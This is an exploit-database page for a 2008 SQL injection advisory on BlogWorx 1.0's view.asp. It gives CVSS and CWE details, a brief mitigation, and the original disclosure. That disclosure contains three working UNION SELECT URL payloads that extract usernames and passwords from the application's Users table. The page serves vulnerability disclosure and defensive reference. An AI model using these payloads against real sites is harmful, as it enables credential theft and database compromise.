header-logo
Suggest Exploit
vendor:
BlogWorx
by:
The_BekiR, fahn, ka0x, xarnux, Ruslan, Tevfik Cevik, Ferruh Mavituna, nettoxic, sersak
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BlogWorx
Affected Version From: BlogWorx 1.0
Affected Version To: BlogWorx 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:blogworx:blogworx:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

BlogWorx ‘view.asp’ Multiple SQL Injection Vulnerability

BlogWorx is prone to multiple SQL injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit these issues to manipulate SQL queries, disclose sensitive information, modify data, and potentially compromise the application and the underlying database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.
Source

Exploit-DB raw data:

BlogWorx 'view.asp'  Multiple SQL Injection Vulnerability

Discovered By : U238

WebPage         : http://noexec.blogspot.com

mail                  : setuid.noexec0x1[a.q]hotmail[d0t].com


Script               : http://devworx.somee.com/projects/project.asp?pid=20

Script (alternativ)   : http://www.codedworld.com/download/blogworx/74764.html

Exploits   >>

http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users

: The_BekiR  - fahn - ka0x - xarnux - Ruslan - Tevfik Cevik - Ferruh Mavituna - nettoxic  - sersak :

# milw0rm.com [2008-04-21]